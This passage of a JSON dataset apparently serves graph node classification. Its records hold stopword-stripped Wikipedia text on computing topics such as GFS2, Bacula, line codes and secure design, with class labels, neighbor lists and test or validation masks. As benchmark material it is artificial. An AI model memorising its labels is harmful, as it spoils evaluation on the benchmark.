pack much functionality things quite impressive ... learned quite lot project frustrating annoying fascinating experience multiple reviews cover lmdb various languages including chinese",
    "neighbors": [
      5120,
      6797,
      10921,
      5546,
      7983,
      7347,
      10292,
      823,
      5560,
      1593,
      1594,
      8772,
      8262,
      9286,
      9948,
      3427,
      8554,
      5492,
      2045,
      9343
    ],
    "mask": "Test"
  },
  {
    "node_id": 2967,
    "label": 2,
    "text": "BeleniX:belenix belenix discontinued operating system distribution built using opensolaris source base used live cd well installed hard disk information provided belenix website may appear currently belenix compiled 32-bit execution i586/pentium op-code based compounded lack clarity belenix site whether belenix distribution supports true 64-bit i.e. x86-64/amd64 solaris kernel userland however oblique references belenix team members indicated belenix 0.7 live cd contains 32-bit 64-bit installation files initially developed live cd along lines knoppix showcase opensolaris technologies belenix went become initial base sun opensolaris distribution number technologies pioneered belenix project gone become full projects right within opensolaris ecosystem belenix focused using kde desktop environment although xfce also supported since beginning distribution upcoming release also include first-class support gnome belenix dev team focuses technology innovation aims working communities including opensolaris based distros milax nexenta os schillix name logo references celtic god light belenus belenix aims latest stable revisions software packages continuously pushed package repository aim mind however many cases bleeding-edge software pushed help validate try new features due reasons belenix also includes lot third-party drivers may found official opensolaris distribution sun focus belenix developer desktop also stable scalable enough work workstation development server environment mainly due quality underlying opensolaris kernel userland environment belenix thus also first-class opensolaris development environment completely self-hosting every package included belenix built belenix including opensolaris kernel belenix aims easy-to-use distribution gently exposes power opensolaris live cd format makes opensolaris easily approachable boots within two three minutes cd-rom also aims encourage innovation bringing new features usability enhancements increasing community participation announcement opensolaris project belenix started private project sun employees working sun india engineering centre bangalore india year 2005 aim something along lines knoppix showcase opensolaris end users weeks time iso image ready people make use period time belenix developed grew popularity non-sun contributors also joined effort developing foss community project belenix first opensolaris distribution bundle complete working xorg x11 gui environment years number critical innovations sprung belenix project later incorporated opensolaris distributions sun fact first beta release sun opensolaris distro largely based belenix belenix second opensolaris distribution appear schillix first provide auto-configuring xorg based gui introduced various missing technologies opensolaris important innovations include project indiana leveraged technologies served starting point taking technologies developed indiana account future focus belenix set evolve grow source-level indiana derivate focus kde desktop make fully featured functional opensolaris distro based kde check livecd features timeline references see chronological account belenix development till release opensolaris distro sun 2008 belenix team aims ensure packages co-exist system ensuring latest versions package built latest compilers result belenix far kde 3.5.9 built gcc 3.4.3 newer packages including kde4 increasingly built gcc 4.4 packages especially gnome components derived jds project built sun studio 12 actively migrated gcc 4.4 team aims eventually belenix built completely foss toolchain gcc belenix far positioned kde distribution also providing xfce upcoming releases also provide gnome belenix today uses caiman installer libraries used sun opensolaris distro going forward plans re-implement installer gui qt4 still using underlying caiman installer libraries belenix team presently continues use svr4 packaging solaris provided date team intend use ips present state due various technical reasons considering alternatives including deb format rpm5 format along smart package manager",
    "neighbors": [
      8077,
      4637,
      5280,
      6049,
      10016,
      6445,
      9665,
      463,
      5335,
      9693,
      6371,
      11363,
      5096,
      5356,
      366,
      11506,
      5363,
      5492,
      5240,
      4858,
      381,
      1150,
      9343
    ],
    "mask": "Test"
  },
  {
    "node_id": 2968,
    "label": 5,
    "text": "Line_code:line code telecommunication line code pattern voltage current photons used represent digital data transmitted transmission line repertoire signals usually called constrained code data storage systems signals prone error others conveyed communication channel physics communication storage medium constrains repertoire signals used reliably common line encodings unipolar polar bipolar manchester code line coding signal put physical communication channel either transmission medium data storage medium common physical channels common binary line codes include line code advantages disadvantages line codes chosen meet one following criteria long-distance communication channels reliably transport dc component dc component also called disparity bias dc coefficient disparity bit pattern difference number one bits vs number zero bits running disparity running total disparity previously transmitted bits simplest possible line code unipolar gives many errors systems unbounded dc component line codes eliminate dc component codes called dc-balanced zero-dc dc-free three ways eliminating dc component bipolar line codes two polarities generally implemented rz radix three since three distinct output levels negative positive zero one principle advantages type code completely eliminate dc component important signal must pass transformer long transmission line unfortunately several long-distance communication channels polarity ambiguity polarity-insensitive line codes compensate channels three ways providing unambiguous reception 0 1 bits channels reliable clock recovery receiver maximum run length constraint may imposed generated channel sequence i.e. maximum number consecutive ones zeros bounded reasonable number clock period recovered observing transitions received sequence maximum run length guarantees clock recovery sequences without constraint could seriously hamper detection quality run-length limited rll coding line coding technique used send arbitrary data communications channel bandwidth limits rll codes defined four main parameters n k first two n refer rate code remaining two specify minimal maximal k number zeroes consecutive ones used telecommunication storage systems move medium past fixed recording head specifically rll bounds length stretches runs repeated bits signal change runs long clock recovery difficult short high frequencies might attenuated communications channel modulating data rll reduces timing uncertainty decoding stored data would lead possible erroneous insertion removal bits reading data back mechanism ensures boundaries bits always accurately found preventing bit slip efficiently using media reliably store maximal amount data given space early disk drives used simple encoding schemes rll 0,1 fm code followed rll 1,3 mfm code widely used hard disk drives mid-1980s still used digital optical discs cd dvd md hi-md blu-ray using efm efmplus codes higher density rll 2,7 rll 1,7 codes became de facto industry standard hard disks early 1990s line coding make possible receiver synchronize phase received signal synchronization ideal signal decoded optimal differences amplitude various digits symbols used line code increase error probability received data biphase line codes require least one transition per bit time makes easier synchronize transceivers detect errors however baud rate greater nrz codes also preferred line code structure enable error detection note line-coded signal signal produced terminal may differ thus requiring translation line code typically reflect technical requirements transmission medium optical fiber shielded twisted pair requirements unique medium one different behavior related interference distortion capacitance loss amplitude optical line codes",
    "neighbors": [
      8192,
      2306,
      10381,
      1550,
      7698,
      2968,
      2971,
      5020,
      5664,
      11686,
      2989,
      3886,
      816,
      5304,
      67,
      3140,
      7108,
      10833,
      8287,
      3040,
      8160,
      2920,
      7400
    ],
    "mask": "Test"
  },
  {
    "node_id": 2969,
    "label": 4,
    "text": "Conference_on_Email_and_Anti-Spam:conference email anti-spam conference email anti-spam ceas annual scientific conference sponsored microsoft subjects relating email use abuse latter commonly known spam ceas hosts concurrent open competition spam filters known ceas live spam filter challenge first conference held july 30–31 2004 2008 conference site always california either mountain view stanford university web site also apparently hosted stanford university sixth conference ceas held mountain view california seventh conference held redmond washington",
    "neighbors": [
      10906,
      9053,
      6094,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 2970,
    "label": 4,
    "text": "Bacula:bacula bacula open-source enterprise-level computer backup system heterogeneous networks designed automate backup tasks often required intervention systems administrator computer operator bacula supports linux unix windows macos backup clients range professional backup devices including tape libraries administrators operators configure system via command line console gui web interface back-end catalog information stored mysql postgresql sqlite bacula set computer programs managing backup recovery verification computer data across network—providing backup solution mixed operating system environments bacula open-source released agpl version 3 license exceptions permit linking openssl distributing windows binaries bacula available dual license see multi-licensing agplv3 proprietary license several entities offer commercial support agpl bacula community version bacula systems sells various levels annual support contracts bacula enterprise edition contains various non-gpl components developed in-house 2015 bacula systems named top 20 promising data center solution providers cio review common dual-license software components developed bacula enterprise edition released bacula community edition period exclusivity proprietary version since april 2002 bacula 2 million downloads makes downloaded open-source backup program bacula features include client software executed file daemon running bacula client supports multiple operating systems default bacula differential incremental backups based system time stamps consequently move files existing directory move whole directory backup fileset full backup files may backed incremental save may old dates must explicitly update date/time stamp moved files bacula versions starting 3.0 later support accurate backup option addresses issue without requiring modification files timestamps feature always used accurate state filesystem important criteria applied configurable i.e inode comparisons modification times md5/sha1 signatures 2011 graham keeling former bacula community developer released friendly fork bacula february 2013 former bacula community developer several free software users released bareos fork bacula",
    "neighbors": [
      5472,
      9441,
      2274,
      3366,
      6280,
      5546,
      5612,
      6797,
      1358,
      7022,
      7983,
      4561,
      6993,
      10831,
      10924,
      823,
      8539,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2971,
    "label": 5,
    "text": "Wire_protocol:wire protocol computer networking wire protocol refers way getting data point point wire protocol needed one application interoperate generally refers protocols higher physical layer contrast transport protocols transport level like tcp udp term wire protocol used describe common way represent information application level refers common application layer protocol common object semantic applications representation application level needs common infoset e.g xml data binding using e.g common encoding scheme like xsd wire protocol may either text-based binary protocol although important architectural decision separate matter distinction wire protocols programmatic apis electronics wire protocol mechanism used transmit data one point another wire protocol provides means interoperation one applications network often refer distributed object protocols use applications designed work together name suggests distributed object protocols run different processes one several computers connected network wire protocols provide means program running one operating system communicate program running operating system using internet interconnect multiple platforms language-independent allowing communication programs written different languages examples wire protocols include",
    "neighbors": [
      1280,
      6694,
      10924,
      3983,
      11413,
      10486,
      2968,
      479
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2972,
    "label": 1,
    "text": "QUEL_query_languages:quel query languages quel relational database query language based tuple relational calculus similarities sql created part ingres dbms effort university california berkeley based codd earlier suggested implemented data sub-language alpha quel used short time products based freely available ingres source code notably implementation called postquel supported postgres oracle db2 gained market share early 1980s companies supporting quel moved sql instead quel continues available part ingres dbms although quel-specific language enhancements added many years quel statements always defined tuple variables used limit queries return result sets consider example taken one first original ingres papers equivalent sql statement sample simple session creates table inserts row retrieves modifies data inside finally deletes row added assuming name unique field another feature quel built-in system moving records en-masse system consider command creates comma-delimited file records student table d1 indicates delimiter opposed data type changing codice_1 codice_2 reverses process similar commands available many sql systems usually external tools opposed internal sql language makes unavailable stored procedures quel extremely powerful aggregation capability aggregates nested different aggregates independent by-lists and/or restriction clauses example example illustrates one arguably less desirable quirks quel namely string comparisons potentially pattern matches codice_3 matches y.str values starting ii",
    "neighbors": [
      6161,
      10389,
      151,
      4263,
      10413,
      6451,
      9286,
      9290,
      8788,
      2901,
      8539,
      987,
      4065,
      4066,
      6629,
      11625,
      6775,
      6651,
      6780
    ],
    "mask": "Test"
  },
  {
    "node_id": 2973,
    "label": 4,
    "text": "Edward_J._Barrett:edward j. barrett rear admiral edward joseph barrett born august 14 1943 flag officer united states coast guard serving chief systems united states coast guard serving 1966 1999 grandfather former nsa contractor edward snowden barrett born city poughkeepsie state new york united states august 14 1943 graduated united states coast guard academy 1966 barrett completed naval flight training nas pensacola florida 1968 1995 barrett inducted united states coast guard academy hall fame admiral barrett testified congress several times regards narcotics explosives ship scanning technology barrett father elizabeth wendy snowden jennifer barrett julie barret former father law chief warrant officer aviation maintenance 4 lonnie snowden ret uscg",
    "neighbors": [
      7887,
      3495
    ],
    "mask": "None"
  },
  {
    "node_id": 2974,
    "label": 6,
    "text": "GFS2:gfs2 computing global file system 2 gfs2 shared-disk file system linux computer clusters gfs2 differs distributed file systems afs coda intermezzo glusterfs gfs2 allows nodes direct concurrent access shared block storage addition gfs gfs2 also used local filesystem gfs disconnected operating-mode client server roles nodes gfs cluster function peers using gfs cluster requires hardware allow access shared storage lock manager control access storage lock manager operates separate module thus gfs gfs2 use distributed lock manager dlm cluster configurations nolock lock manager local filesystems older versions gfs also support gulm server-based lock manager implements redundancy via failover gfs gfs2 free software distributed terms gnu general public license development gfs began 1995 originally developed university minnesota professor matthew o'keefe group students originally written sgi irix operating system 1998 ported linux since open source code provided convenient development platform late 1999/early 2000 made way sistina software lived time open-source project 2001 sistina made choice make gfs proprietary product developers forked opengfs last public release gfs enhanced include updates allowing work opendlm opengfs opendlm became defunct since red hat purchased sistina december 2003 released gfs many cluster-infrastructure pieces gpl late june 2004 red hat subsequently financed development geared towards bug-fixing stabilization development gfs2 derives gfs included along distributed lock manager shared gfs linux 2.6.19 red hat enterprise linux 5.2 included gfs2 kernel module evaluation purposes 5.3 update gfs2 became part kernel package gfs forms part fedora red hat enterprise linux 5.3 upwards associated centos linux distributions users purchase commercial support run gfs fully supported top red hat enterprise linux since red hat enterprise linux version 5.3 red hat enterprise linux advanced platform included support gfs additional cost following list summarizes version numbers major features introduced design gfs gfs2 targets san-like environments although possible use single node filesystem full feature-set requires san take form iscsi fibrechannel aoe device presented linux block device shared number nodes example drbd device dlm requires ip based network communicate normally ethernet many possible solutions depending upon choice san may possible combine normal practice involves separate networks dlm storage gfs requires fencing hardware kind requirement cluster infrastructure rather gfs/gfs2 required multi-node clusters usual options include power switches remote access controllers e.g drac ipmi ilo fencing used ensure node cluster believes failed suddenly start working another node recovering journal failed node also optionally restart failed node automatically recovery complete although designers gfs/gfs2 aimed emulate local filesystem closely number differences aware due existing filesystem interfaces allowing passing information relating cluster stem difficulty implementing features efficiently clustered manner example main difference one shared similar cluster filesystems cache control mechanism known glocks pronounced gee-locks gfs/gfs2 effect across whole cluster inode filesystem two glocks associated one called iopen glock keeps track processes inode open inode glock controls cache relating inode glock four states un unlocked sh shared – read lock df deferred – read lock incompatible sh ex exclusive four modes maps directly dlm lock mode ex mode inode allowed cache data metadata might dirty i.e waiting write back filesystem sh mode inode cache data metadata must dirty df mode inode allowed cache metadata must dirty df mode used direct i/o un mode inode must cache metadata order operations change inode data metadata interfere ex lock used means certain operations create/unlink files directory writes file general restricted one node cluster course operations multiple nodes work expected due requirement flush caches frequently efficient single frequently asked question gfs/gfs2 performance performance poor email servers solution break mail spool separate directories try keep far possible node reading writing private set directories gfs gfs2 journaled file systems gfs2 supports similar set journaling modes ext3 data=writeback mode metadata journaled mode supported gfs however possible turn journaling individual data-files zero size journaled files gfs number restrictions placed upon support mmap sendfile system calls also use different on-disk format regular files also inherit-journal attribute set directory causes files sub-directories created within directory journal inherit-journal respectively flag set used instead data=journal mount option ext3 supports gfs/gfs2 gfs2 also supports data=ordered mode similar data=writeback except dirty data synced journal flush completed ensures blocks added inode content synced back disk metadata updated record new size thus prevents uninitialised blocks appearing file node failure conditions default journaling mode data=ordered match ext3 default gfs2 yet support data=journal mode unlike gfs use on-disk format regular journaled files also supports journaled inherit-journal attributes gfs2 also relaxes restrictions file may journaled attribute changed time file open also ext3 performance reasons node gfs gfs2 journal gfs journals disk extents gfs2 journals regular files number nodes may mount filesystem one time limited number available journals gfs2 adds number new features gfs summary features already mentioned boxes right page gfs2 designed upgrading gfs would simple procedure end on-disk structure remained gfs including big-endian byte ordering differences though journaling systems gfs gfs2 compatible upgrading possible means tool gfs2_convert run filesystem off-line update metadata spare blocks gfs journals used create small per_node files required gfs2 update process data remains place gfs2 meta filesystem filesystem right alternate root main filesystem although behaves like normal filesystem contents various system files used gfs2 normally users need ever look gfs2 utilities mount unmount meta filesystem required behind scenes",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      1553,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      7225,
      11323,
      8772,
      1109,
      5723,
      4708,
      8298,
      9836,
      7789,
      9333,
      6263,
      9335,
      4729,
      3708,
      9343,
      9353,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      7863,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      10961,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      4841,
      8938,
      1263,
      3312,
      9455,
      3826,
      2291,
      9972,
      246,
      3834,
      3326,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      2322,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      7983,
      11568,
      6961,
      6963,
      1844,
      823,
      6970,
      11072,
      10051,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      8539,
      2397,
      5472,
      4961,
      5474,
      5988,
      10596,
      2407,
      10087,
      11638,
      6519,
      376,
      11128,
      890,
      11643,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      437,
      8631,
      1464,
      1978,
      10172,
      8643,
      7126,
      2015,
      1509,
      2021,
      9189,
      5096,
      7663,
      11256,
      2555,
      2044,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 2975,
    "label": 4,
    "text": "Secure_by_design:secure design secure design software engineering means software designed foundation secure malicious practices taken granted care taken minimize impact anticipation security vulnerabilities security vulnerability discovered invalid user input closely related practice using good software design domain-driven design cloud native way increase security reducing risk vulnerability-opening mistakes—even though design principles used originally conceived security purposes generally designs work well rely secret often secrecy reduces number attackers demotivating subset threat population logic increase complexity attacker increased attacker effort compromise target technique implies reduced inherent risks virtually infinite set threat actors techniques applied time cause secrecy methods fail mandatory proper security usually means everyone allowed know understand design secure advantage many people looking computer code improves odds flaws found sooner see linus law attackers also obtain code makes easier find vulnerabilities well also important everything works fewest privileges possible see principle least privilege example web server runs administrative user root admin privilege remove files users belong flaw program could put entire system risk whereas web server runs inside isolated environment privileges required network filesystem functions compromise system runs unless security around also flawed many things especially input distrusted secure design fault-tolerant program could even distrust internals two examples insecure design allowing buffer overflows format string vulnerabilities following c program demonstrates flaws gets function c standard library stop writing bytes codice_1 reads newline character eof typing 99 characters prompt constitutes buffer overflow allocating 100 characters codice_1 assumption almost given name user longer 99 characters n't prevent user actually typing 99 characters lead arbitrary machine code execution second flaw program tries print input passing directly codice_3 function function prints first argument replacing conversion specifications et cetera sequentially arguments call stack needed thus malicious user entered instead name program would attempt print non-existent integer value undefined behavior would occur related mistake web programming online script validate parameters example consider script fetches article taking filename read script parsed script might use following hypothetical url retrieve article dog food script input checking instead trusting filename always valid malicious user could forge url retrieve configuration files webserver depending script may expose /etc/passwd file unix-like systems contains among others user ids login names home directory paths shells see sql injection similar attack server/client architectures program side may authorised client client server may authorised server even man-in-the-middle attack could compromise communications often easiest way break security client/server system go head security mechanisms instead go around man middle attack simple example use collect details impersonate user important consider encryption hashing security mechanisms design ensure information collected potential attacker wo n't allow access another key feature client-server security design good coding practices example following known software design structure client broker help designing well-built structure solid foundation furthermore software modified future even important follows logical foundation separation client server programmer comes clearly understand dynamics program may end adding changing something add security flaw even best design always possibility better standardized design less chance occurring",
    "neighbors": [
      899,
      5636,
      10756,
      9607,
      9356,
      9488,
      3473,
      8978,
      5397,
      10392,
      5373,
      5246,
      4892,
      5404,
      9248,
      2084,
      2213,
      8998,
      939,
      3629,
      9646,
      3887,
      5040,
      7855,
      1970,
      4914,
      9780,
      11188,
      5433,
      7739,
      700,
      2878,
      3262,
      9791,
      1474,
      3525,
      8773,
      7368,
      9160,
      4298,
      10442,
      5325,
      10835,
      2262,
      6360,
      7421,
      9688,
      7515,
      4956,
      225,
      3941,
      6373,
      107,
      4972,
      11244,
      2041,
      10492,
      5245,
      2558,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 2976,
    "label": 4,
    "text": "Carbon_Black_(company):carbon black company carbon black inc. formerly bit9 inc. cybersecurity company based waltham massachusetts company develops cloud-native endpoint security software designed detect malicious behavior help prevent malicious files attacking organization company leverages technology known predictive security cloud psc big data analytics cloud platform analyzes customers ’ unfiltered data threats company approximately 100 partners including ibm vmware partners account approximately 125 product integrations according s-1 filing sec carbon black currently 5,600-plus customers including approximately one third fortune 100 4 may 2018 company joined public markets listing cblk nasdaq exchange part ipo carbon black raised approximately 152 million valuation 1.25 billion prior ipo firm raised 190m investors including kleiner perkins highland capital sequoia accomplice blackstone carbon black founded bit9 inc. 2002 todd brennan allen hillery john hanratty company first ceo george kassabgi current ceo patrick morley formerly chief operating officer corel took position 2007 2013 company network broken malicious actors copied private signing key certificate used sign malware february 2014 bit9 acquired start-up security firm carbon black time acquisition company also raised 38.25 million series e funding bringing bit9 ’ total venture capital raised approximately 120 million company acquired objective logistics june 2015 august 2015 carbon black announced acquired data analytics firm visitrend would open technology development center downtown boston month later company announced would partner secureworks ernst young kroll trustwave rapid7 provide managed security incident response services company changed name bit9 inc carbon black inc. february 1 2016 july 2016 carbon black announced acquired next-generation antivirus provider confer undisclosed sum prior deal confer raised 25m venture funding 50 employees according wall street journal deal valued 100m",
    "neighbors": [
      2213,
      10437,
      11146,
      5579,
      10539,
      9488,
      4471,
      6431
    ],
    "mask": "Test"
  },
  {
    "node_id": 2977,
    "label": 9,
    "text": "DaVinci_(software):davinci software davinci development tool used create html5 mobile applications media content includes jquery framework javascript library used developers designers create web applications used mobile devices user experience similar native applications business applications games rich media content html5 multi-media magazines advertisements animation may produced tool davinci based standard web technology including html5 css3 javascript davinci composed davinci studio davinci animator handle application programming ui design respectively tool wysiwyg see get authoring environment users may drag drop components build applications design web content open source libraries knockout jsview/jsrender impress.js turn.js included tool open source frameworks may also integrated model view controller mvc data binding javascript may handled davinci ’ data-set editor view components model data may visually bound allows users create web applications server integrated ui components without coding davinci also includes n-screen editor automatically applies designs functions screen size various devices smartphones tablet pcs smarttv davinci worked closely jquery foundation presenting first jquery conference asian district november 12 2012 seoul south korea davinci used tool demonstrate application development techniques conference",
    "neighbors": [
      1083,
      803,
      3462
    ],
    "mask": "None"
  },
  {
    "node_id": 2978,
    "label": 2,
    "text": "Roboto:roboto roboto neo-grotesque sans-serif typeface family developed google system font mobile operating system android released 2011 android 4.0 ice cream sandwich google developed font modern yet approachable emotional entire font family licensed apache license 2014 roboto redesigned android 5.0 lollipop roboto default font android since 2013 google services google+ google play youtube google maps mobile google search 2017 roboto used lcd countdown clocks new york city subway b division lines roboto bold default font unreal engine 4 kodi roboto condensed used display information european versions nintendo switch packaging including physical releases games font designed entirely in-house christian robertson previously released expanded ubuntu-title font personal type foundry betatype font officially made available free download january 12 2012 newly launched android design website compared android previous system font humanist sans-serif droid roboto belongs neo-grotesque genre sans-serif typefaces includes thin light regular medium bold black weights matching oblique styles rather true italics also includes condensed styles light regular bold also matching oblique designs 2014 matias duarte announced google i/o roboto significantly redesigned android 5.0 lollipop punctuation marks tittles lowercase j changed square rounded roboto received variable reviews release joshua topolsky editor-in-chief technology news media network verge describes font clean modern overly futuristic – science fiction font however typography commentator stephen coles typographica.org called initial release roboto “ four-headed frankenfont ” describing “ hodgepodge ” different typographic styles work well together type design professionals called obvious errors accented glyphs john gruber called font helvetica ripoff roboto supports latin greek partial cyrillic scripts android noto font used languages supported roboto including chinese simplified traditional japanese korean thai hindi roboto slab slab serif font based roboto introduced march 2013 default font google note-taking service google keep font changed sans-serif roboto 2018 available four weights thin light regular bold however oblique versions released roboto mono monospace font based roboto available five weights thin light regular medium bold oblique stylings weight heebo extension roboto includes hebrew characters",
    "neighbors": [
      4096,
      5637,
      8719,
      3600,
      7700,
      9244,
      11294,
      1578,
      10284,
      4141,
      5677,
      3633,
      1083,
      6212,
      69,
      8262,
      4683,
      4685,
      11343,
      3664,
      8280,
      8285,
      2658,
      9320,
      10352,
      11391,
      1670,
      7816,
      5262,
      6800,
      11408,
      10393,
      8858,
      7835,
      673,
      7841,
      8870,
      1191,
      1203,
      7359,
      10432,
      196,
      3269,
      3782,
      8907,
      10445,
      3795,
      1240,
      8413,
      9949,
      6367,
      1255,
      236,
      8940,
      2798,
      9970,
      7926,
      3836,
      8701,
      5892,
      7428,
      8455,
      2828,
      280,
      10009,
      10525,
      798,
      288,
      2852,
      4901,
      8486,
      10537,
      7983,
      3380,
      5431,
      2875,
      3900,
      10045,
      11590,
      11592,
      11082,
      332,
      9039,
      3409,
      8019,
      2901,
      5467,
      3940,
      5483,
      7548,
      1409,
      4995,
      9610,
      10129,
      5522,
      1427,
      5524,
      10645,
      1435,
      1959,
      937,
      5546,
      3499,
      6057,
      7595,
      4044,
      4048,
      2001,
      11221,
      479,
      6632,
      9192,
      1516,
      5100,
      5613,
      9712,
      1011,
      5620,
      11252,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2979,
    "label": 2,
    "text": "List_of_iOS_devices:list ios devices list comparison devices designed marketed apple inc. run unix-like operating system named ios ipados often colloquially referred simply idevices devices include iphone ipod touch design similar iphone cellular radio cell phone hardware ipad three devices function digital audio portable media players internet clients apple tv runs tvos set-top box streaming media local sources certain internet services connected television set screen 1.35 billion ios devices sold worldwide march 2015 operating system ios devices updated itunes ios 5 later using over-the-air ota updates major version ios tends released every time new type iphone launched usually year minor changes throughout year needed updates free ios devices although ipod touch users formerly required pay update apple upgrades products hardware periodically approximately yearly source second third generation apple tv run unnamed operating system derived ios fourth subsequent generations apple tv run ios-based tvos first generation ran modified version mac os x tiger instead ios apple runs tests pre-production units determine battery life however purported maximums actual user experiences vary numbers hours unless specified apple increased storage capacity devices time units available given storage capacity indicated table indicates highest supported versions ios available generation ios devices beta versions may listed support discontinued older devices 3½-inch display introduced original iphone almost unchanged models 2010 ipad larger display also uses different aspect ratio resolution iphone 4 iphone 4s fourth generation ipod touch keep physical dimensions prior models double resolution dimensions thereby quadrupling number pixels amount space iphone 5 first departure traditional iphone ipod touch screen size increasing 3.5 4 resolution increased include extra screen space iphone 6 iphone 6 plus second departure traditional iphone ipod touch screen size increasing screen sizes 4 4.7 5.5 respectively increased resolution include extra screen space note hardware reviewers commented benchmark results comparable cpu/socs architecture due software codes optimization",
    "neighbors": [
      4609,
      7170,
      10755,
      9732,
      1549,
      5647,
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      6186,
      4139,
      6700,
      7211,
      1074,
      8754,
      9784,
      8253,
      576,
      7745,
      1090,
      8783,
      4180,
      10838,
      1623,
      3672,
      10840,
      9312,
      3681,
      9826,
      10336,
      8806,
      3691,
      2673,
      6258,
      10357,
      6264,
      4220,
      7292,
      2686,
      6783,
      7806,
      10365,
      10878,
      4741,
      9863,
      8842,
      6283,
      7824,
      147,
      659,
      7830,
      6807,
      5784,
      1177,
      4251,
      3228,
      2207,
      4258,
      7842,
      7844,
      11430,
      171,
      2735,
      3248,
      9391,
      4283,
      3772,
      7869,
      8893,
      8896,
      6654,
      4807,
      4810,
      3790,
      1744,
      2259,
      3286,
      9430,
      3293,
      4318,
      9952,
      6884,
      231,
      2282,
      9451,
      1772,
      4844,
      9964,
      1776,
      10481,
      7420,
      1290,
      3338,
      781,
      4879,
      784,
      9999,
      10512,
      5397,
      4888,
      5912,
      8480,
      2339,
      10023,
      2345,
      4910,
      4399,
      7983,
      11062,
      7991,
      11066,
      2363,
      2365,
      2366,
      9022,
      11257,
      1346,
      10562,
      838,
      7496,
      8525,
      2383,
      2388,
      8534,
      3928,
      8540,
      4957,
      6495,
      8544,
      9063,
      10602,
      3948,
      11629,
      10608,
      9084,
      7549,
      11649,
      2439,
      6023,
      3977,
      6539,
      7052,
      1428,
      3483,
      10658,
      9123,
      8109,
      10675,
      2492,
      446,
      7614,
      5058,
      10691,
      2502,
      456,
      1482,
      7118,
      464,
      6608,
      8662,
      9174,
      10199,
      8665,
      7133,
      9182,
      4068,
      5093,
      487,
      488,
      2023,
      8170,
      10734,
      5616,
      6130,
      7154,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2980,
    "label": 7,
    "text": "Distributed_object:distributed object distributed computing distributed objects objects sense object-oriented programming distributed across different address spaces either different processes computer even multiple computers connected via network work together sharing data invoking methods often involves location transparency remote objects appear local objects main method distributed object communication remote method invocation generally message-passing one object sends message another object remote machine process perform task results sent back calling object distributed objects popular late 1990s early 2000s since fallen favor term may also generally refer one extensions basic object concept used context distributed computing replicated objects live distributed objects see also internet protocol suite local distributed objects differ many respects rpc facilities cross platform serialization protocol cap n proto amount distributed object protocol distributed object method calls executed chained single network request needs interface references/capabilities distributed objects implemented objective-c using cocoa api nsconnection class supporting objects distributed objects used java rmi corba lets one build distributed mixed object systems dcom framework distributed objects microsoft platform ddobjects framework distributed objects using borland delphi jt framework distributed components using messaging paradigm javaspaces sun specification distributed shared memory space based pyro framework distributed objects using python programming language distributed ruby drb framework distributed objects using ruby programming language",
    "neighbors": [
      545,
      5409,
      8100,
      5029,
      3494,
      4423,
      10024,
      10470,
      8554,
      10122,
      8652,
      8303,
      5364,
      1049,
      5531,
      5598
    ],
    "mask": "Test"
  },
  {
    "node_id": 2981,
    "label": 9,
    "text": "TrueImage:trueimage trueimage postscript-compatible interpreter clone originally developed cal bauer bauer enterprises sold microsoft 1989 microsoft subsequently cross-licensed trueimage apple computer exchange truetype license many delays microsoft finally delivered version 1.0 trueimage apple apple announced would licensing postscript level 2 adobe systems months later apple tried build one product trueimage trueimage products ever released company however trueimage used variety laser printers abaton okidata lasermaster mid-1990s limited success",
    "neighbors": [
      2107,
      8628
    ],
    "mask": "Test"
  },
  {
    "node_id": 2982,
    "label": 8,
    "text": "Personal_broadcasting:personal broadcasting personal broadcasting particular type broadcasting individual broadcaster creates content webcam camcorder transmits internet broadcasting personal context production also feel content type broadcasting individuals editors directors broadcasting personal broadcasting popularly used individuals event holders want broadcast one event audience watch live internet personal broadcasting gives individuals another way interact one another gives brands another way interact customers individual entrepreneurs use personal broadcasting boost brands among young consumers personal broadcasting differs types broadcasting way fixed broadcasting time broadcaster freely choose broadcasting content personal broadcasting limited celebrities public figures produced regular people anybody anywhere time broadcast content free market personal broadcasting allows ordinary individuals broadcast internet rapidly growing personal broadcasting individuals free stream sort broadcast want attract viewers send real-time comments text messages displayed directly across screens broadcaster see respond way viewers watch videos personal broadcasters time share thoughts feelings others live since beginning 2000s personal broadcasting gaining lot interest public become one entertainment options popularity watching video increased demand personal broadcasting initiated rise penetration smartphone equipped high-definition cameras new generation video applications enabled individuals broadcast straight one ’ mobile device whenever like wherever may widespread supply different types broadcasting software including live-streaming applications allowed individuals easily broadcast encouraged popularity personal broadcasting among young generation willing show personal lives online fun fame personal broadcasting lets individuals engaged self-branding turning private public new form mobile self-expression personal broadcasting popularized china republic korea particular despite increasing number personal broadcasting services lacks proper monitoring systems look illicit contents",
    "neighbors": [
      1083
    ],
    "mask": "None"
  },
  {
    "node_id": 2983,
    "label": 5,
    "text": "Gateway-to-Gateway_Protocol:gateway-to-gateway protocol gateway-to-gateway protocol ggp obsolete protocol defined routing datagrams internet gateways gateway-to-gateway protocol designed internet protocol ip datagram service similar transmission control protocol tcp user datagram protocol udp however classified internet layer protocol ggp uses minimum hop algorithm measures distance router hops router defined zero hops directly connected networks one hop networks reachable one gateway protocol implements distributed shortest-path methodology therefore requires global convergence routing tables change link connectivity network ggp message field header identifies message type format remaining fields core routers participated ggp core routers controlled central authority routers could interfere exchange",
    "neighbors": [
      10242,
      3847,
      649,
      9868,
      3218,
      9365,
      10005,
      11413,
      5402,
      5531,
      3742,
      10271,
      9380,
      2085,
